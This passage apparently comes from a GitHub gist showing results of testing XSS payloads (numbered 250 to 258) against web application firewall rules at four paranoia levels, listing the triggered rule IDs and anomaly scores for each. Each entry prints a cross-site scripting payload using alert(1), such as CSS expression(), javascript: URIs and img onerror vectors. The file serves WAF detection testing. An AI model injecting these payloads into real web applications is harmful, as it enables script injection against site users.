920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920460 PL4 Abnormal character escapes in request
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 59
****** payload-250 ********
Payload:
payload=<div style=xss:expressio&amp;#x5c;6e(alert(1))></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 15
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
Total Incoming Score: 35
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 48
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 69
****** payload-251 ********
Payload:
payload=<div style=xss=expression(alert(1))>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 10
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 25
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 41
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 54
****** payload-252 ********
Payload:
payload=<div style="color&amp;#x3dred">test</div></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 15
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942210 PL2 Detects chained SQL injection attempts 1/2
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 45
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942210 PL2 Detects chained SQL injection attempts 1/2
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 58
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942210 PL2 Detects chained SQL injection attempts 1/2
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 79
****** payload-253 ********
Payload:
payload=<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a></a>
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 58
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 74
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 87
****** payload-254 ********
Payload:
payload=<script> function window.onload(){ alert(1); </script>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 25
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 41
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 54
****** payload-255 ********
Payload:
payload=<script> function window::onload(){ alert(1); </script>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 28
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 44
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 57
****** payload-256 ********
Payload:
payload=<script> function window.location(){ </script>
--- Paranoia Level 1 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 30
--- Paranoia Level 3 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 46
--- Paranoia Level 4 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 59
****** payload-257 ********
Payload:
payload=<script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){} </script>
--- Paranoia Level 1 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 53
--- Paranoia Level 3 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 69
--- Paranoia Level 4 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 82
****** payload-258 ********
Payload:
payload=<script> function document.body.innerHTML(){ x = "<img src=1 onerror=alert(1)>"; } </script>
--- Paranoia Level 1 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941330 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 63
--- Paranoia Level 3 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941330 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 79
--- Paranoia Level 4 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941330 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 92
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment